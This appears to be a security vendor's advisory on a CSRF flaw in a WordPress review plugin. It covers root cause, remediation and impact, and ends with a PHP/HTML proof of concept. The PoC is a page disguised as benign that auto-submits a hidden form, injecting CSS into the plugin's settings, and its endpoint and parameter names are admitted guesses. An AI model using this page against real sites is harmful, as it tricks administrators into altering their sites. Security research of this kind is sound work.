Atomic Edge analysis of CVE-2026-1076 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Star Review Manager WordPress plugin versions up to and including 1.2.2. The vulnerability resides in the plugin’s settings page, allowing attackers to modify CSS settings without proper nonce validation. The CVSS score of 4.3 (Medium) reflects the requirement for user interaction and the limited impact scope.
Atomic Edge research identifies the root cause as missing nonce validation on a WordPress admin form handler. The CWE-352 classification confirms this is a classic CSRF vulnerability where the plugin processes state-changing requests without verifying their origin. The vulnerability description explicitly states the settings page lacks nonce checks. This conclusion is directly inferred from the CWE and description, as no source code is available for confirmation. The plugin likely uses a standard WordPress admin menu callback function that handles POST requests without calling `check_admin_referer()` or `wp_verify_nonce()`.
Exploitation requires an attacker to trick an authenticated administrator into clicking a malicious link or visiting a crafted page. The attack vector uses a forged HTTP POST request to the plugin’s settings update endpoint. Based on WordPress plugin conventions, Atomic Edge analysis suggests the endpoint is likely `/wp-admin/admin.php?page=star-review-manager-settings` or a similar admin page. The payload would contain POST parameters like `css_settings` or `custom_css` with attacker-controlled CSS values. A successful attack would inject malicious CSS into the site’s front-end.
Remediation requires adding proper nonce verification to the settings update handler. The fix should implement WordPress’s standard CSRF protection pattern: generate a nonce with `wp_nonce_field()` in the settings form HTML, then validate it with `check_admin_referer()` or `wp_verify_nonce()` in the form processing logic. The nonce should be tied to the specific admin action, such as `update_star_review_settings`. This ensures requests originate from the intended user session.
The impact of successful exploitation is limited to modification of the plugin’s CSS settings. Attackers can inject arbitrary CSS code, potentially enabling limited defacement or UI manipulation through CSS injection. The vulnerability does not allow privilege escalation, remote code execution, or data theft directly. However, malicious CSS could be used in conjunction with other techniques for social engineering attacks. The CVSS vector confirms no confidentiality or availability impact (C:N/A:N), with low integrity impact (I:L).
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1076 - Star Review Manager <= 1.2.2 - Cross-Site Request Forgery to Settings Update
<?php
/**
* Proof of Concept for CVE-2026-1076
* This script generates an HTML page that contains a forged form targeting the
* Star Review Manager plugin's settings update endpoint.
* When visited by an authenticated WordPress administrator, the form automatically
* submits and updates the plugin's CSS settings.
*
* ASSUMPTIONS (based on WordPress plugin patterns):
* 1. The plugin uses a standard WordPress admin menu with slug 'star-review-manager'
* 2. Settings are saved via POST to /wp-admin/admin.php?page=star-review-manager-settings
* 3. The CSS setting parameter is named 'custom_css' or similar
* 4. No nonce validation exists on the settings save handler
*/
$target_url = "https://vulnerable-site.com/wp-admin/admin.php?page=star-review-manager-settings";
// Malicious CSS payload - example: hide critical page elements
$malicious_css = "/* Injected via CSRF */ .checkout-button { display: none !important; }";
?>
<!DOCTYPE html>
<html>
<head>
<title>Benign Page</title>
<script>
// Auto-submit form on page load
window.onload = function() {
document.getElementById('csrf-form').submit();
};
</script>
</head>
<body>
<h1>Loading...</h1>
<!-- Hidden form that targets the vulnerable endpoint -->
<form id="csrf-form" action="<?php echo htmlspecialchars($target_url); ?>" method="POST" style="display:none;">
<!-- Assumed parameter name based on plugin functionality -->
<input type="hidden" name="custom_css" value="<?php echo htmlspecialchars($malicious_css); ?>">
<!-- Other potential parameter names if the above doesn't work -->
<input type="hidden" name="css_settings" value="<?php echo htmlspecialchars($malicious_css); ?>">
<input type="hidden" name="srm_custom_css" value="<?php echo htmlspecialchars($malicious_css); ?>">
<input type="hidden" name="action" value="save_settings">
<input type="hidden" name="submit" value="Save Changes">
</form>
</body>
</html>